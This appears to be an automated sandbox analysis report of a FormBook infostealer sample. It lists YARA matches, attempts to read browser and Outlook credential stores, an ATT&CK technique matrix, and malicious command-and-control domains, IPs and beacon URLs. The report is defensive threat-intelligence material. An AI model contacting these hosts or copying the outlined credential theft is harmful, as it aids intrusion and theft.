Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\iuvRyl9i7D.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\control.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data	Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.iuvRyl9i7D.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.0.iuvRyl9i7D.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 12.2.iuvRyl9i7D.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.iuvRyl9i7D.exe.3e937b8.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000C.00000002.367415725.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.508372558.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.333082585.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.293257859.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000000.352301866.000000000B601000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.367669336.0000000000BB0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000000.292843973.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000C.00000002.367791319.0000000001000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.298160865.0000000003E93000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.509171386.00000000009D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.510342424.0000000000CE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	612 Process Injection	1 Masquerading	1 OS Credential Dumping	321 Security Software Discovery	Remote Services	1 Email Collection	Exfiltration Over Other Network Medium	1 Encrypted Channel	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	Exfiltration Over Bluetooth	3 Ingress Tool Transfer	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	1 Shared Modules	Logon Script (Windows)	Logon Script (Windows)	31 Virtualization/Sandbox Evasion	Security Account Manager	31 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	4 Obfuscated Files or Information	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	23 Software Packing	DCSync	113 System Information Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Link
iuvRyl9i7D.exe	24%	Virustotal	Browse
iuvRyl9i7D.exe	20%	ReversingLabs
iuvRyl9i7D.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\dDqpEdJEtzi.exe	20%	ReversingLabs

Unpacked PE Files

Source	Detection	Scanner	Label	Download
12.0.iuvRyl9i7D.exe.400000.4.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
12.0.iuvRyl9i7D.exe.400000.8.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
12.0.iuvRyl9i7D.exe.400000.6.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File
12.2.iuvRyl9i7D.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen	Download File

Domains

Source	Detection	Scanner	Label	Link
www.bldh45.xyz	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://kace.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.fontbureau.comueo	0%	Avira URL Cloud	safe
http://ansu.uspplongee.com/	0%	Avira URL Cloud	safe
http://sangdu.uspplongee.com/	0%	Avira URL Cloud	safe
http://meilong.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.uspplongee.com	0%	Avira URL Cloud	safe
http://tanshuan.uspplongee.com/	0%	Avira URL Cloud	safe
http://tuikun.uspplongee.com/	0%	Avira URL Cloud	safe
https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://epa.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/:	0%	URL Reputation	safe
http://sanque.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/2	0%	URL Reputation	safe
http://penjian.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/ana	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fontbureau.comgrito	0%	URL Reputation	safe
http://www.ascendercorp.com/typedesigners.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/(	0%	URL Reputation	safe
http://genzi.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.uspplongee.com/n6g4/	100%	Avira URL Cloud	malware
http://www.fontbureau.com.TTF	0%	URL Reputation	safe
http://www.galapagosdesign.com/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/U	0%	URL Reputation	safe
http://gonglang.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.properscooter.com/n6g4/	100%	Avira URL Cloud	malware
http://www.galapagosdesign.com/staff/dennis.html	0%	Avira URL Cloud	safe
http://qunben.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.fontbureau.comlic	0%	URL Reputation	safe
http://www.bldh45.xyz/n6g4/	0%	Avira URL Cloud	safe
http://www.fontbureau.comI.TTF:	0%	Avira URL Cloud	safe
http://www.kickball.site/n6g4/	100%	Avira URL Cloud	phishing
http://www.carterandcone.coml	0%	URL Reputation	safe
http://randu.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/y	0%	URL Reputation	safe
http://www.founder.com.cn/cn.	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y0(	0%	Avira URL Cloud	safe
http://www.kickball.site/n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu	100%	Avira URL Cloud	phishing
http://en.wi5	0%	Avira URL Cloud	safe
http://shangeng.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/r	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/o	0%	URL Reputation	safe
http://www.jamesreadtanusa.com/n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/n	0%	URL Reputation	safe
http://www.founder.com.cn/cn5	0%	URL Reputation	safe
http://weimen.uspplongee.com/	0%	Avira URL Cloud	safe
http://mianta.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.fontbureau.comFU	0%	Avira URL Cloud	safe
http://www.fontbureau.comsivao	0%	Avira URL Cloud	safe
http://www.carterandcone.comn-u	0%	URL Reputation	safe
http://www.dems-clicks.com/n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV	100%	Avira URL Cloud	malware
http://rechan.uspplongee.com/	0%	Avira URL Cloud	safe
http://wudie.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://saoshui.uspplongee.com/	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.zhongyicts.com.cn)	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
a6.pingcache.com	38.34.163.59	true	true		unknown
www.bldh45.xyz	35.241.47.216	true	false	1%, Virustotal, Browse	unknown
www.dems-clicks.com	5.183.8.183	true	true		unknown
www.jamesreadtanusa.com	35.209.127.155	true	true		unknown
parkingpage.namecheap.com	198.54.117.216	true	false		high
vip.myshopline.shop	104.17.232.29	true	false		unknown
properscooter.com	198.54.116.236	true	true		unknown
www.zeavd.com	unknown	unknown	true		unknown
www.properscooter.com	unknown	unknown	true		unknown
www.kickball.site	unknown	unknown	true		unknown
www.uspplongee.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.uspplongee.com/n6g4/	true	Avira URL Cloud: malware	unknown
http://www.properscooter.com/n6g4/	true	Avira URL Cloud: malware	unknown
http://www.bldh45.xyz/n6g4/	false	Avira URL Cloud: safe	unknown
http://www.kickball.site/n6g4/	true	Avira URL Cloud: phishing	unknown
http://www.kickball.site/n6g4/?r2MLI=tjrDPFcXi&3fe=WPwjmGPV/4M22m+CqZhMswVRWzk0CJ3SgF5yTNe9lepyZyn4WVCBytWkJrBAR4vfZGHu	true	Avira URL Cloud: phishing	unknown
http://www.jamesreadtanusa.com/n6g4/?3fe=T/V9232RQ/ScvLe6YjNRob4pJIAHZz6ft2oS65luWeOdjKzDide1cQ8VyF5HdhGZwVKQ&r2MLI=tjrDPFcXi	true	Avira URL Cloud: safe	unknown
http://www.dems-clicks.com/n6g4/?r2MLI=tjrDPFcXi&3fe=oW3KVVYaOTtIW39xG4fO+4eOl+SZoa0wNC6PzHd9cdjmCRbC1fenw4N50qr8bcYtnznV	true	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://kace.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.comueo	iuvRyl9i7D.exe, 00000000.00000003.251614077.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251650593.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251457232.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251042075.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250842535.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251521721.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251241602.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251088919.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251421233.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.250772094.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251278974.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251544135.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251220537.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251756044.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251002977.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251866854.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251295969.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251839011.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251345771.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251710288.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.251678493.0000000005F30000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://contextual.media.net/medianet.phpcid=8CU157172&crid=858412214&size=306x271&https=1	control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
http://ansu.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://consent.google.com/hl=en-GB&origin=https://www.google.com&continue=https://www.google.com/?g	control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
http://sangdu.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=&ved=2ahUKEwj8k7G9rJDsAhWNTxUIHZZGDCQQ	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://meilong.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.uspplongee.com	control.exe, 00000015.00000002.511522267.00000000052EB000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tanshuan.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.msn.com/ocid=iehp	control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
http://tuikun.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com&continue=https://www.google.com/?gws_rd%3Dssl&if=1&m=0&pc=s&wp=-1&gl=GB&uxe=4	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.sajatypeworks.com	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://epa.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	iuvRyl9i7D.exe, 00000000.00000002.300790084.0000000007112000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/:	iuvRyl9i7D.exe, 00000000.00000003.249208046.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248902113.0000000005F30000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248700253.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249125283.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248822952.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248234193.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248356549.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248834441.0000000005F2F000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248606868.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249059165.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.249031929.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp, iuvRyl9i7D.exe, 00000000.00000003.248315923.0000000005F2E000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://consent.google.com/done8?continue=https://www.google.com/?gws_rd%3Dssl&origin=https://www.go	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000015.00000002.509355844.0000000000A24000.00000004.00000020.00020000.00000000.sdmp	false		high
https://www.google.com/intl/en_uk/chrome/thank-you.html?statcb=0&installdataindex=empty&defaultbrows	control.exe, 00000015.00000003.434675742.0000000000A4A000.00000004.00000020.00020000.00000000.sdmp	false		high
http://sanque.uspplongee.com/	control.exe, 00000015.00000002.511351963.0000000004C72000.00000004.10000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
